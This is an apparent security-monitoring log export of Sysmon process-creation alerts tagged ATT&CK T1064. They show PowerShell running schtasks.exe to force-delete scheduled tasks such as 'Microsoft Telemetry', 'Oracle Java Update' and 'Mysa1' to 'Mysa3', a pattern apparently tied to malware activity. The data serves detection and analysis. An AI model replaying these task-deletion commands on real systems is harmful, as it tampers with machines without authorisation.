+TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Microsoft Telemetry\"" 
/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:00.180542600Z"",""eventRecordID"":""3040"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:00.160\r\nProcessGuid: {df9fc3d3-b3b4-5ecf-0000-0010f4d02600}\r\nProcessId: 1680\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Microsoft Telemetry\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:00.160"",""processGuid"":""{df9fc3d3-b3b4-5ecf-0000-0010f4d02600}"",""processId"":""1680"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Microsoft Telemetry\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:28.436",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:00.100 +ProcessGuid: {df9fc3d3-b3b4-5ecf-0000-001061ce2600} +ProcessId: 8072 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Oracle Java Update"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} 
+ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Java Update\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:00.109326100Z"",""eventRecordID"":""3039"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:00.100\r\nProcessGuid: {df9fc3d3-b3b4-5ecf-0000-001061ce2600}\r\nProcessId: 8072\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Java Update\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo 
-NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:00.100"",""processGuid"":""{df9fc3d3-b3b4-5ecf-0000-001061ce2600}"",""processId"":""8072"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Oracle Java Update\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:28.383",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:00.069 +ProcessGuid: {df9fc3d3-b3b4-5ecf-0000-001079cc2600} +ProcessId: 3496 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Oracle Java"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: 
{df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Java\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:00.071667200Z"",""eventRecordID"":""3038"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:00.069\r\nProcessGuid: {df9fc3d3-b3b4-5ecf-0000-001079cc2600}\r\nProcessId: 3496\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Java\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:00.069"",""processGuid"":""{df9fc3d3-b3b4-5ecf-0000-001079cc2600}"",""processId"":""3496"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Oracle Java\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:28.345",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:00.036 +ProcessGuid: {df9fc3d3-b3b4-5ecf-0000-0010d1ca2600} +ProcessId: 1996 +Image: 
C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ok /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ok /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:00.039233200Z"",""eventRecordID"":""3037"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:00.036\r\nProcessGuid: {df9fc3d3-b3b4-5ecf-0000-0010d1ca2600}\r\nProcessId: 1996\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN 
ok /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:00.036"",""processGuid"":""{df9fc3d3-b3b4-5ecf-0000-0010d1ca2600}"",""processId"":""1996"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN ok /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 
14:19:28.325",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:00.001 +ProcessGuid: {df9fc3d3-b3b4-5ecf-0000-0010c4c82600} +ProcessId: 6724 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Mysa3 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa3 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:00.004539200Z"",""eventRecordID"":""3036"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:00.001\r\nProcessGuid: {df9fc3d3-b3b4-5ecf-0000-0010c4c82600}\r\nProcessId: 6724\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 
(WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa3 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:00.001"",""processGuid"":""{df9fc3d3-b3b4-5ecf-0000-0010c4c82600}"",""processId"":""6724"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Mysa3 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:28.308",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:59.960 +ProcessGuid: {df9fc3d3-b3b3-5ecf-0000-0010fbc62600} +ProcessId: 7924 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Mysa2 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa2 
/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:59.964907500Z"",""eventRecordID"":""3035"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:59.960\r\nProcessGuid: {df9fc3d3-b3b3-5ecf-0000-0010fbc62600}\r\nProcessId: 7924\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa2 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:59.960"",""processGuid"":""{df9fc3d3-b3b3-5ecf-0000-0010fbc62600}"",""processId"":""7924"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Mysa2 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:28.294",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:59.923 +ProcessGuid: {df9fc3d3-b3b3-5ecf-0000-001020c52600} +ProcessId: 7284 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Mysa1 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
